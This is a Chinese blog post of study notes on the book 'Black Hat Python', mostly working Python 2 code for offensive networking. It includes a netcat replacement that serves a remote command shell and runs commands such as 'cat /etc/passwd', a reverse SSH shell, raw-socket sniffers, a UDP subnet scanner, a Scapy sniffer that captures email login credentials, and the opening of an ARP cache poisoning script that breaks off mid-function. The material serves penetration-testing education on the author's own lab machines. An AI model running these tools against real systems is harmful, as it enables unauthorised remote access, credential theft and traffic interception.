当前位置:   article > 正文

Python黑帽子--黑客与渗透测试编程之道_paramiko.ssh_exception.sshexception: channel close

paramiko.ssh_exception.sshexception: channel closed.

为了方便查找,请看目录(手机端就没有目录哦)→→→→→→→→→→→→→→→

注:本文篇幅较大,请耐心等待(power by 《Python黑帽子:黑客与渗透测试编程之道 》)

 

欢迎光顾我的新博客:https://www.giantbranch.cn

 

终于学完了,也敲完代码了,其中有好几个都没成功实践出作者的预期结果,知道我哪里错的,欢迎指点。(有问题的同学可以看看评论,或许有其他同学解答了的)

最后感谢 用户  mackfqq_31229763 的鼓励

 

全部代码下载(github):我手敲的代码,中文注释(还添加了自己的注释),也有作者提供的源码,不过作者的不完整,我的还包含了字典什么的[这是个超链接]

 

第一章 设置Python环境

kali虚拟机

开始用pip安装github3.py,没什么问题

跟着安装WingIDE,下载linux对应位数的版本的deb,就行了,但是产生了依赖

 

于是修改软件源APT-sources.list

vim /etc/apt/sources.list

将原来的注释掉,加了个阿里的

 

#阿里云kali源

deb http://mirrors.aliyun.com/kali sana main non-free contrib

deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free

deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free

apt-get update & apt-get upgrade

apt-get -f install

最后再安装deb文件就行了,命令如上面截图

 

因为wingide收费版才有自动补全,那就用有现成序列号的pycharm4.5吧~~,没补全真难受

 

第二章 网络基础

 

TCP客户端

可以看到百度返回的HTTP响应啦

 

UDP客户端

首先先用nc监听一下9999端口,-u就是udp模式的啦,哈哈发过去了,最后打印出了ip和端口,nc没发数据过来,可能就没收到数据咯

现在就可以比较一下tcp和udp的区别了,最核心的是udp不用连接,因为是无状态的协议

发送和接受的函数也是有区别的,通过实验发现recv和recvfrom的参数是接收几个字符的意思

 

TCP服务器

 

  1. #-*- coding:utf8 -*-
  2. import socket
  3. import threading
  4. bind_ip = "0.0.0.0" #绑定ip:这里代表任何ip地址
  5. bind_port = 8888
  6. server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  7. server.bind((bind_ip, bind_port))
  8. # 最大连接数为5
  9. server.listen(5)
  10. print "[*] Listening on %s:%d" % (bind_ip, bind_port)
  11. # 这是客户处理进程
  12. def handle_client(client_socket):
  13. #打印出客户端发送得到的内容
  14. request = client_socket.recv(1024)
  15. print "[*] Received: %s" % request
  16. #发送一个数据包
  17. client_socket.send("ACK!")
  18. client_socket.close()
  19. while True:
  20. client,addr = server.accept()
  21. print "[*] Accepted connection from: %s:%d" % (addr[0], addr[1])
  22. #挂起客户端线程,处理传人的数据
  23. client_handler = threading.Thread(target=handle_client, args=(client,))
  24. client_handler.start()

 

用之前的tcp客户端连接,收到信息了

同时,服务端也收到了客户端发来的信息

 

取代netcat

代码:

 

  1. #!/usr/bin/python
  2. #-*- coding:utf8 -*-
  3. import sys
  4. import socket
  5. import getopt
  6. import threading
  7. import subprocess
  8. # 定义一些全局变量
  9. listen = False
  10. command = False
  11. upload = False
  12. execute = ""
  13. target = ""
  14. upload_destination = ""
  15. port = 0
  16. def run_command(command):
  17. # 删除字符串末尾的空格
  18. command = command.rstrip()
  19. # 运行命令并将输出放回
  20. try:
  21. output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
  22. except:
  23. output = "Failed to execute command.\r\n"
  24. # 将输出发送
  25. return output
  26. def client_handler(client_socket):
  27. global upload
  28. global execute
  29. global command
  30. # 检查上传文件
  31. if len(upload_destination):
  32. # 读取所有的字符并写下目标
  33. file_buffer = ""
  34. # 持续读取数据直到没有符合的数据
  35. while True:
  36. data = client_socket.recv(1024)
  37. if not data:
  38. break
  39. else:
  40. file_buffer += data
  41. try:
  42. file_descriptor = open(upload_destination, "wb")
  43. file_descriptor.write(file_buffer)
  44. file_descriptor.close()
  45. client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
  46. except:
  47. client_socket.send("Failed to save file to %s\r\n" % upload_destination)
  48. # 检查命令执行
  49. if len(execute):
  50. # 运行命令
  51. output = run_command(execute)
  52. client_socket.send(output)
  53. # 如果需要一个命令行shell,那么我们进入另一个循环
  54. if command:
  55. while True:
  56. # 跳出一个窗口
  57. client_socket.send("<BHP:#>")
  58. cmd_buffer = ""
  59. while "\n" not in cmd_buffer:
  60. cmd_buffer += client_socket.recv(1024)
  61. # 返回命令输出
  62. response = run_command(cmd_buffer)
  63. # 返回响应数据
  64. client_socket.send(response)
  65. def server_loop():
  66. global target
  67. # 如果没有定义目标,那我们监听所有接口
  68. if not len(target):
  69. target = "0.0.0.0"
  70. server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  71. server.bind((target, port))
  72. server.listen(5)
  73. while True:
  74. client_socket, addr = server.accept()
  75. # 分拆一个线程处理新的客户端
  76. client_thread = threading.Thread(target=client_handler, args=(client_socket,))
  77. client_thread.start()
  78. def client_sender(buffer):
  79. client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  80. try:
  81. # 连接到目标主机
  82. client.connect((target, port))
  83. if len(buffer):
  84. client.send(buffer)
  85. while True:
  86. # 现在等待数据回传
  87. recv_len = 1
  88. response = ""
  89. while recv_len:
  90. data = client.recv(4096)
  91. recv_len = len(data)
  92. response += data
  93. if recv_len < 4096:
  94. break
  95. print response
  96. # 等待更多的输入
  97. buffer = raw_input("")
  98. buffer += "\n"
  99. # 发送出去
  100. client.send(buffer)
  101. except:
  102. print "[*] Exception! Exiting."
  103. #关闭连接
  104. client.close()
  105. def usage():
  106. print "BHP Net Tool"
  107. print
  108. print "Usage: bhpnet.py -t target_host - p port"
  109. print "-l --listen - listen on [host]:[port] for incoming connections"
  110. print "-e --execute=file_to_run -execute the given file upon receiving a connection"
  111. print "-c --command - initialize a commandshell"
  112. print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"
  113. print
  114. print
  115. print "Examples:"
  116. print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
  117. print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
  118. print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
  119. print "echo 'ABCDEFGHI' | python ./bhpnet.py -t 192.168.11.12 -p 135"
  120. sys.exit(0)
  121. def main():
  122. global listen
  123. global port
  124. global execute
  125. global command
  126. global upload_destination
  127. global target
  128. if not len(sys.argv[1:]):
  129. usage()
  130. # 读取命令行选项,若没有该选项则显示用法
  131. try:
  132. opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",["help", "listen", "execute", "target", "port", "command", "upload"])
  133. except getopt.GetoptError as err:
  134. print str(err)
  135. usage()
  136. for o,a in opts:
  137. if o in ("-h","--help"):
  138. usage()
  139. elif o in ("-l", "--listen"):
  140. listen = True
  141. elif o in ("-e", "--execute"):
  142. execute = a
  143. elif o in ("-c", "--commandshell"):
  144. command = True
  145. elif o in ("-u", "--upload"):
  146. upload_destination = a
  147. elif o in ("-t", "--target"):
  148. target = a
  149. elif o in ("-p", "--port"):
  150. port = int(a)
  151. else:
  152. assert False,"Unhandled Option"
  153. #我们是进行监听还是仅从标准输入读取数据并发送数据?
  154. if not listen and len(target) and port > 0:
  155. # 从命令行读取内存数据
  156. # 这里将阻塞,所以不再向标准输入发送数据时发送CTRL-D
  157. buffer = sys.stdin.read()
  158. # 发送数据
  159. client_sender(buffer)
  160. # 我们开始监听并准备上传文件,执行命令
  161. # 放置一个反弹shell
  162. # 取决于上面的命令行选项
  163. if listen:
  164. server_loop()
  165. #调用main函数
  166. main()

 

一开始没在前头打python,默认是不是用python解析运行的,所以会出错,kali就会变成截图了

 

下面的客户端连接时,连接后要按CTRL+D让其返回shell

 

如果你不想每次都打python才能运行,就在第一行加入#!/usr/bin/python(如果python默认安装在那个目录的话)

 

创建一个TCP代理

用法: ./文件名.py [localhost] [localport] [remotehost] [remoteport] [receive_first]           //最后一个参数是 是否从远程服务器(主机)接收数据

可以看到这个是监听本地的80端口,远程主机就是百度的域名,也是80端口,那么我们将代理设置为127.0.0.1 80的话,其实我们只能访问百度,因为开代理时已决定了你要访问的域名(主机),具体看下图

设置完代理,再打开百度,我们在下图可看到GET请求的全部内容,这确实比我们直接访问百度多了一跳。

过程如下:

浏览器将GET请求发送给本地的80端口,又我们的程序监听的是本地的80端口,就会将GET请求发送给远程主机(即我们开启程序时设置的www.baidu.com的80端口),最后再将www.baidu.com返回的数据给回程序,再给回浏览器(那为什么我们访问其他网址或ip不能呢,就是你发送的GET请求给www.baidu.com他会返回你要的网址的内容给你么,那当然不会,所以就只能访问百度域名下的各种目录)

还有返回的响应数据,其实我觉得这好像在抓包了

 

 

通过Paramiko使用SSH

首先安装paramiko模块,还是去了点小问题,好像是安装过了吧,要我升级一下?

代码(这里也是可以用密钥认证来登陆的,这里就注释掉了)

可以看到跟我直接用xshell 连接自己的树莓派执行的结果是一致的。

 

反向ssh

为了适应非默认端口,改了一下作者的客户端代码,修改处已圈出

可能是什么权限什么的,认证成功,最后连接不成功

在kali测试还是一样~~,有谁告诉我原因,我只有那个私钥和作者不一样啊~~~

 

2017.06.03更新:

感谢largewave用户指出

在下面的Server类中的check_channel_request函数应该return paramiko.OPEN_SUCCEEDED

而不是paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

 

  1. class Server(paramiko.ServerInterface):
  2. def __init__(self):
  3. self.event = threading.Event()
  4. def check_channel_request(self, kind, chanid):
  5. if kind == 'session':
  6. return paramiko.OPEN_SUCCEEDED
  7. def check_auth_password(self, username, password):
  8. if (username == 'root') and (password == 'lovepython'):
  9. return paramiko.AUTH_SUCCESSFUL
  10. return paramiko.AUTH_FAILED

 

 

 

这样即可认证成功,但之后执行命令又出现问题了,

报错如下:

paramiko.ssh_exception.SSHException: Channel closed.

知道的可以继续留言,感谢各位的交流和学习,虽然好久没搞web 了

 

ssh隧道

建议看一下这篇文章,你会对ssh隧道的理解更直观,我的理解简单来说就是一条管道,其实别人说隧道也觉得差不多啦

http://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html

 

在本地用locate命令找不到paramiko的示例文件rforward.py,最终通过谷歌终于找到了,原来在github上:https://github.com/paramiko/paramiko/tree/master/demos,之前那个test_rsa.key文件也在上面了

 

一开始将我的树莓派(192.168.88.102)作为ssh客户端,端口为5556,,与kali(10.10.10.145:6666)建立一个反向ssh隧道

在服务端kaili执行

 

python rforward.py 192.168.88.102 -p 5556  -r 10.10.10.145:6666  --user pi --password

 

 

跟着kali端  

 

nc -l 6666


但在树莓派执行

 

 

nc 127.0.0.1 5556

并不能连接,出错了(说是拒绝),详见下图最后一行

 

 

于是就尝试kali的22端口

 

python rforward.py 192.168.88.102 -p 5556  -r 10.10.10.145:22  --user pi --password

 

 

 

 

 

可以看到成功了,而且隧道建立后树莓派那边(客户端)的127.0.0.1:5556处于监听状态,我们发送到本地5556的请求会转发到10.10.10.145的22端口啦~~

 

 

第三章 网络:原始套接字和流量嗅探

 

Windows和Linux上的包嗅探

 

  1. #-*- coding:utf8 -*-
  2. import socket
  3. import os
  4. # 监听主机,即监听那个网络接口,下面的为我的kali的ip
  5. host = "10.10.10.145"
  6. # 创建原始套接字,然后绑定在公开接口上
  7. if  os.name == "nt":
  8.     socket_protocol = socket.IPPROTO_IP
  9. else:
  10.     socket_protocol = socket.IPPROTO_ICMP
  11. sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)   #raw的中文是生的意思,大概就是原始套接字的意思吧
  12. sniffer.bind((host, 0)) #这里端口为0,监听所有端口吧~
  13. # 设置在捕获的数据包中包含IP头
  14. sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
  15. # 在Windows平台上,我们需要设置IOCTL以启用混杂模式
  16. if os.name == "nt":
  17.     sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_NO)
  18. # 读取单个数据包
  19. print sniffer.recvfrom(65565)
  20. # 在Windows平台上关闭混杂模式
  21. if os.name == "nt":
  22.     sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)

 

 

运行结果:可以看到成功抓取到了ping的包,虽然前面的看不懂,但最后的ip机看得懂了

 

 

解码IP层

 

  1. #-*- coding:utf8 -*-
  2. import socket
  3. import os
  4. import struct
  5. from ctypes import *
  6. # 监听主机,即监听那个网络接口,下面的ip为我的kali的ip
  7. host = "10.10.10.145"
  8. # ip头定义
  9. class IP(Structure):
  10. _fields_ = [
  11. ("ihl", c_ubyte, 4), #ip head length:头长度
  12. ("version", c_ubyte, 4), #版本
  13. ("tos", c_ubyte), #服务类型
  14. ("len", c_ushort), #ip数据包总长度
  15. ("id", c_ushort), #标识符
  16. ("offset", c_ushort), #片偏移
  17. ("ttl", c_ubyte), #生存时间
  18. ("protocol_num", c_ubyte), #协议数字,应该是协议类型,这里用数字来代表时哪个协议,下面构造函数有设置映射表
  19. ("sum", c_ushort), #头部校验和
  20. ("src", c_ulong), #源ip地址
  21. ("dst", c_ulong) #目的ip地址
  22. ]
  23. # __new__(cls, *args, **kwargs) 创建对象时调用,返回当前对象的一个实例;注意:这里的第一个参数是cls即class本身
  24. def __new__(self, socket_buffer=None):
  25. return self.from_buffer_copy(socket_buffer)
  26. # __init__(self, *args, **kwargs) 创建完对象后调用,对当前对象的实例的一些初始化,无返回值,即在调用__new__之后,根据返回的实例初始化;注意,这里的第一个参数是self即对象本身【注意和new的区别】
  27. def __init__(self, socket_buffer=None):
  28. # 协议字段与协议名称的对应
  29. self.protocol_map = {1:"ICMP", 6:"TCP", 17:"UDP"}
  30. # 可读性更强的ip地址(转换32位打包的IPV4地址为IP地址的标准点号分隔字符串表示。)
  31. self.src_address = socket.inet_ntoa(struct.pack("<L", self.src))
  32. self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst))
  33. # 协议类型
  34. try:
  35. self.protocol = self.protocol_map[self.protocol_num]
  36. except:
  37. self.protocol = str(self.protocol_num)
  38. if os.name == "nt":
  39. socket_protocol = socket.IPPROTO_IP
  40. else:
  41. socket_protocol = socket.IPPROTO_ICMP
  42. sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol) #raw的中文是生的意思,大概就是原始套接字的意思吧
  43. sniffer.bind((host, 0)) #这里端口为0,监听所有端口吧~
  44. # 设置在捕获的数据包中包含IP头
  45. sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
  46. # 在Windows平台上,我们需要设置IOCTL以启用混杂模式
  47. if os.name == "nt":
  48. sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
  49. try:
  50. while True:
  51. # 读取数据包
  52. raw_buffer = sniffer.recvfrom(65565)[0]
  53. # 将缓冲区的前20个字节按IP头进行解析
  54. ip_header = IP(raw_buffer[0:20])
  55. # 输出协议和通信双方IP地址
  56. print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address)
  57. # 处理CTRL-C
  58. except KeyboardInterrupt:
  59. # 如果运行再Windows上,关闭混杂模式
  60. if os.name == "nt":
  61. sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)

 

 

 

在windows 7运行结果,我开的软件比较多,抓取数据速度还是很快

 

但在kali就又出问题了,不知道为什么,20改成32也不行,因为解析是按20字节解析的

 

放到我的树莓派去试试吧~,一开始没用sudo,应该是原始套接字需要较高权限,毕竟比较底层的东西

跟着呢就ping了两下百度,也抓取到了,ip是没错的,linux只能抓icmp的,所以只能看到这两条了,不然还能看到树莓派其他软件的网络数据流量

 

 

解码ICMP

 

这是一个完整的ICMP类型的列表:从百科复制过来的,以便于分析

type=3且code=3就说明主机存在,因为发送UDP数据到关闭的端口会产生type=3且code=3的ICMP包,如果不存在这样的主机他是不会回复的

TYPECODEDescriptionQueryError
00Echo Reply——回显应答(Ping应答)x 
30Network Unreachable——网络不可达 x
31Host Unreachable——主机不可达 x
32Protocol Unreachable——协议不可达 x
33Port Unreachable——端口不可达 x
34Fragmentation needed but no frag. bit set——需要进行分片但设置不分片比特 x
35Source routing failed——源站选路失败 x
36Destination network unknown——目的网络未知 x
37Destination host unknown——目的主机未知 x
38Source host isolated (obsolete)——源主机被隔离(作废不用) x
39Destination network administratively prohibited——目的网络被强制禁止 x
310Destination host administratively prohibited——目的主机被强制禁止 x
311Network unreachable for TOS——由于服务类型TOS,网络不可达 x
312Host unreachable for TOS——由于服务类型TOS,主机不可达 x
313Communication administratively prohibited by filtering——由于过滤,通信被强制禁止 x
314Host precedence violation——主机越权 x
315Precedence cutoff in effect——优先中止生效 x
40Source quench——源端被关闭(基本流控制)  
50Redirect for network——对网络重定向  
51Redirect for host——对主机重定向  
52Redirect for TOS and network——对服务类型和网络重定向  
53Redirect for TOS and host——对服务类型和主机重定向  
80Echo request——回显请求(Ping请求)x 
90Router advertisement——路由器通告  
100Route solicitation——路由器请求  
110TTL equals 0 during transit——传输期间生存时间为0 x
111TTL equals 0 during reassembly——在数据报组装期间生存时间为0 x
120IP header bad (catchall error)——坏的IP首部(包括各种差错) x
121Required options missing——缺少必需的选项 x
130Timestamp request (obsolete)——时间戳请求(作废不用)x 
14 Timestamp reply (obsolete)——时间戳应答(作废不用)x 
150Information request (obsolete)——信息请求(作废不用)x 
160Information reply (obsolete)——信息应答(作废不用)x 
170Address mask request——地址掩码请求x 
180Address mask reply——地址掩码应答  

 

  1. #-*- coding:utf8 -*-
  2. import socket
  3. import os
  4. import struct
  5. from ctypes import *
  6. # 监听主机,即监听那个网络接口,下面的ip为我的kali的ip
  7. host = "10.10.10.145"
  8. # ip头定义
  9. class IP(Structure):
  10. _fields_ = [
  11. ("ihl", c_ubyte, 4), #ip head length:头长度
  12. ("version", c_ubyte, 4), #版本
  13. ("tos", c_ubyte), #服务类型
  14. ("len", c_ushort), #ip数据包总长度
  15. ("id", c_ushort), #标识符
  16. ("offset", c_ushort), #片偏移
  17. ("ttl", c_ubyte), #生存时间
  18. ("protocol_num", c_ubyte), #协议数字,应该是协议类型,这里用数字来代表时哪个协议,下面构造函数有设置映射表
  19. ("sum", c_ushort), #头部校验和
  20. ("src", c_ulong), #源ip地址
  21. ("dst", c_ulong) #目的ip地址
  22. ]
  23. # __new__(cls, *args, **kwargs) 创建对象时调用,返回当前对象的一个实例;注意:这里的第一个参数是cls即class本身
  24. def __new__(self, socket_buffer=None):
  25. return self.from_buffer_copy(socket_buffer)
  26. # __init__(self, *args, **kwargs) 创建完对象后调用,对当前对象的实例的一些初始化,无返回值,即在调用__new__之后,根据返回的实例初始化;注意,这里的第一个参数是self即对象本身【注意和new的区别】
  27. def __init__(self, socket_buffer=None):
  28. # 协议字段与协议名称的对应
  29. self.protocol_map = {1:"ICMP", 6:"TCP", 17:"UDP"}
  30. # 可读性更强的ip地址(转换32位打包的IPV4地址为IP地址的标准点号分隔字符串表示。)
  31. self.src_address = socket.inet_ntoa(struct.pack("<L", self.src))
  32. self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst))
  33. # 协议类型
  34. try:
  35. self.protocol = self.protocol_map[self.protocol_num]
  36. except:
  37. self.protocol = str(self.protocol_num)
  38. class ICMP(Structure):
  39. #
  40. _fields_ = [
  41. ("type", c_ubyte), #类型
  42. ("code", c_ubyte), #代码值
  43. ("checksum", c_ubyte), #头部校验和
  44. ("unused", c_ubyte), #未使用
  45. ("next_hop_mtu", c_ubyte) #下一跳的MTU
  46. ]
  47. def __new__(self, socket_buffer):
  48. return self.from_buffer_copy(socket_buffer)
  49. def __init__(self, socket_buffer):
  50. pass
  51. if os.name == "nt":
  52. socket_protocol = socket.IPPROTO_IP
  53. else:
  54. socket_protocol = socket.IPPROTO_ICMP
  55. sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol) #raw的中文是生的意思,大概就是原始套接字的意思吧
  56. sniffer.bind((host, 0)) #这里端口为0,监听所有端口吧~
  57. # 设置在捕获的数据包中包含IP头
  58. sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
  59. # 在Windows平台上,我们需要设置IOCTL以启用混杂模式
  60. if os.name == "nt":
  61. sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
  62. try:
  63. while True:
  64. # 读取数据包
  65. raw_buffer = sniffer.recvfrom(65565)[0]
  66. # 将缓冲区的前20个字节按IP头进行解析
  67. ip_header = IP(raw_buffer[0:20])
  68. # 输出协议和通信双方IP地址
  69. print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address)
  70. # 如果为ICMP,进行处理
  71. if ip_header.protocol == "ICMP":
  72. # 计算ICMP包的起始位置,并获取ICMP包的数据
  73. offset = ip_header.ihl * 4 #ihl是头部长度,代表32位(即4字节)长的分片的个数 [我的理解是因为一个字节表示一个符号,所以这里的offset要搞成以字节为单位的,为的是下一句的提取数据]
  74. buf = raw_buffer[offset:offset+sizeof(ICMP)]
  75. # 解析ICMP数据
  76. icmp_header = ICMP(buf)
  77. print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code)
  78. # 处理CTRL-C
  79. except KeyboardInterrupt:
  80. # 如果运行再Windows上,关闭混杂模式
  81. if os.name == "nt":
  82. sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)




下面看看ping通的情况 看上表,可看出是一个ping请求,一个ping应答

 

 

 

 

udp主机存活扫描器

首先要安装netaddr第三方库,这个处理IP非常方便

 

easy_install netaddr

如果没有这个命令,就要可能下载配置咯,具体百度,谷歌吧~

 

 

代码如下,改了一句作者的代码,让要扫描的目标网络接收命令行参数,默认就192.168.1.0/24

 

  1. #-*- coding:utf8 -*-
  2. import socket
  3. import os
  4. import struct
  5. import threading
  6. import time
  7. import sys
  8. from netaddr import IPNetwork,IPAddress
  9. from ctypes import *
  10. # 监听主机,即监听那个网络接口,下面的ip为我的kali的ip
  11. host = "10.10.10.145"
  12. # 扫描的目标子网
  13. # subnet = "192.168.1.0/24"
  14. # 没有命令行参数,默认192.168.1.0/24
  15. if len(sys.argv) == 1:
  16. subnet = "192.168.1.0/24"
  17. else:
  18. subnet = sys.argv[1]
  19. # 自定义的字符串,我们将在ICMP响应中进行核对
  20. magic_message = "PYTHONRULES!"
  21. # 批量发送UDP数据包
  22. def udp_sender(subnet, magic_message):
  23. time.sleep(5) #可以说程序暂停5秒吧
  24. # 建立一个socket对象(SOCK_DGRAM:UDP客户端)
  25. sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  26. for ip in IPNetwork(subnet):
  27. try:
  28. # 尝试发送magic_message这个消息到子网的每个ip,还用了个不怎么可能用的65212端口
  29. sender.sendto(magic_message, ("%s" % ip, 65212))
  30. except:
  31. pass #代表什么也不做
  32. # ip头定义
  33. class IP(Structure):
  34. _fields_ = [
  35. ("ihl", c_ubyte, 4), #ip head length:头长度
  36. ("version", c_ubyte, 4), #版本
  37. ("tos", c_ubyte), #服务类型
  38. ("len", c_ushort), #ip数据包总长度
  39. ("id", c_ushort), #标识符
  40. ("offset", c_ushort), #片偏移
  41. ("ttl", c_ubyte), #生存时间
  42. ("protocol_num", c_ubyte), #协议数字,应该是协议类型,这里用数字来代表时哪个协议,下面构造函数有设置映射表
  43. ("sum", c_ushort), #头部校验和
  44. ("src", c_ulong), #源ip地址
  45. ("dst", c_ulong) #目的ip地址
  46. ]
  47. # __new__(cls, *args, **kwargs) 创建对象时调用,返回当前对象的一个实例;注意:这里的第一个参数是cls即class本身
  48. def __new__(self, socket_buffer=None):
  49. return self.from_buffer_copy(socket_buffer)
  50. # __init__(self, *args, **kwargs) 创建完对象后调用,对当前对象的实例的一些初始化,无返回值,即在调用__new__之后,根据返回的实例初始化;注意,这里的第一个参数是self即对象本身【注意和new的区别】
  51. def __init__(self, socket_buffer=None):
  52. # 协议字段与协议名称的对应
  53. self.protocol_map = {1:"ICMP", 6:"TCP", 17:"UDP"}
  54. # 可读性更强的ip地址(转换32位打包的IPV4地址为IP地址的标准点号分隔字符串表示。)
  55. self.src_address = socket.inet_ntoa(struct.pack("<L", self.src))
  56. self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst))
  57. # 协议类型
  58. try:
  59. self.protocol = self.protocol_map[self.protocol_num]
  60. except:
  61. self.protocol = str(self.protocol_num)
  62. class ICMP(Structure):
  63. #
  64. _fields_ = [
  65. ("type", c_ubyte), #类型
  66. ("code", c_ubyte), #代码值
  67. ("checksum", c_ubyte), #头部校验和
  68. ("unused", c_ubyte), #未使用
  69. ("next_hop_mtu", c_ubyte) #下一跳的MTU
  70. ]
  71. def __new__(self, socket_buffer):
  72. return self.from_buffer_copy(socket_buffer)
  73. def __init__(self, socket_buffer):
  74. pass
  75. if os.name == "nt":
  76. socket_protocol = socket.IPPROTO_IP
  77. else:
  78. socket_protocol = socket.IPPROTO_ICMP
  79. sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol) #raw的中文是生的意思,大概就是原始套接字的意思吧
  80. sniffer.bind((host, 0)) #这里端口为0,监听所有端口吧~
  81. # 设置在捕获的数据包中包含IP头
  82. sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
  83. # 在Windows平台上,我们需要设置IOCTL以启用混杂模式
  84. if os.name == "nt":
  85. sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
  86. # 开启多线程发送udp数据包
  87. t = threading.Thread(target=udp_sender, args=(subnet, magic_message))
  88. t.start()
  89. try:
  90. while True:
  91. # 读取数据包
  92. raw_buffer = sniffer.recvfrom(65565)[0]
  93. # 将缓冲区的前20个字节按IP头进行解析
  94. ip_header = IP(raw_buffer[0:20])
  95. # 输出协议和通信双方IP地址
  96. #print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address)
  97. # 如果为ICMP,进行处理
  98. if ip_header.protocol == "ICMP":
  99. # 计算ICMP包的起始位置,并获取ICMP包的数据
  100. offset = ip_header.ihl * 4 #ihl是头部长度,代表32位(即4字节)长的分片的个数 [我的理解是因为一个字节表示一个符号,所以这里的offset要搞成以字节为单位的,为的是下一句的提取数据]
  101. buf = raw_buffer[offset:offset+sizeof(ICMP)]
  102. # 解析ICMP数据
  103. icmp_header = ICMP(buf)
  104. #print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code)
  105. # 检查类型和代码值是否都为3
  106. if icmp_header.type == 3 and icmp_header.code == 3:
  107. # 确认响应的主机再我们的目标子网之内
  108. if IPAddress(ip_header.src_address) in IPNetwork(subnet):
  109. # 确认ICMP包中包含我们发送的自定义的字符串
  110. if raw_buffer[len(raw_buffer) - len(magic_message):] == magic_message:
  111. print "Host Up: %s" % ip_header.src_address
  112. # 处理CTRL-C
  113. except KeyboardInterrupt:
  114. # 如果运行再Windows上,关闭混杂模式
  115. if os.name == "nt":
  116. sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)


运行结果:

 

跟我手机的fing扫描的相比,少了我的手机的ip和另外一个我同学的手机,难道小米有防护?应该只能扫电脑了

值得肯定的是,跟360防蹭网的结果是一样的,说明360的估计方法用的差不多,详细见下一张图的下一张

fing还是挺强大的,能识别主流设备,如树莓派,小米手机等,详细见下图

 

再测试一下其他网段,通过浏览器打开的测试,有些还是web服务器呢,不过下图的是安装完apache的centos,还没部署代码

 

 

第四章 Scapy:网络的掌控者

 

scapy的安装

首先当然要安装scapy,直接给下载网址

https://codeload.github.com/secdev/scapy/zip/v2.3.2

官网也给下,因为可能有更新什么的

http://www.secdev.org/projects/scapy/

 

在kali的安装步骤

  1. unzip scapy-2.3.2.zip
  2. cd scapy-2.3.2
  3. ./setup.py install

 

scapy简单嗅探初探

有个函数说一下

sniff(filter="",iface="any",prn=function,count=N)

filter跟wireshark的过滤类型一样

iface:就是要嗅探的网卡

prn:就是回调函数,简单理解就是会自动调用,它以收到的数据包对象作为唯一参数,你可以在函数中处理数据包

count:嗅探的个数,留空就为无限个

 

代码:

  1. #-*- coding:utf8 -*-
  2. from scapy.all import *
  3. # 定义数据包回调函数
  4. def packet_callback(packet):
  5. print packet.show()
  6. # 开启嗅探器
  7. sniff(prn=packet_callback, count=1)

 

结果:可以看到从以太网协议,ip协议到tcp协议和数据部分都有了,确实很方便

窃取email认证

 

  1. #-*- coding:utf8 -*-
  2. from scapy.all import *
  3. # 定义数据包回调函数
  4. def packet_callback(packet):
  5. if packet[TCP].payload:
  6. mail_packet = str(packet[TCP].payload)
  7. if "user" in mail_packet.lower() or "pass" in mail_packet.lower():
  8. print "[*] Server: %s" % packet[IP].dst
  9. print "[*] %s" % packet[TCP].payload
  10. # print packet.show()
  11. # 开启嗅探器(对常见电子邮件端口进行嗅探110(POP3), 25(SMTP), 143(IMAP), store=0:不保留原始数据包,长时间嗅探的话不会暂用太多内存
  12. sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)

 

 

这里我用命令行模拟邮件登陆(当然我用的是错误的用户名和密码,所以下图是不能登录成功的,但已经说明抓取成功)

我这里以登陆网易的pop3服务器为例(用telnet即可)

 

 

利用Scapy进行ARP缓存投毒

------------------------------------------------------------这个就是我们通常所说的ARP欺骗咯

首先要开启对网关和目标ip地址的流量进行转发的功能

echo 1 > /proc/sys/net/ipv4/ip_forward

  1. #-*- coding:utf8 -*-
  2. from scapy.all import *
  3. import os
  4. import sys
  5. import threading
  6. import signal
  7. interface = "eth0" #要嗅探的网卡
  8. target_ip = "10.10.10.140" #目标ip,这里测试的是另外一台虚拟机winxp
  9. gateway_ip = "10.10.10.2" #网关ip,这里是虚拟机的网关
  10. packet_count = 1000
  11. def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
  12. # 以下代码调用send函数的方式稍有不同
  13. print "[*] Restoring target..."
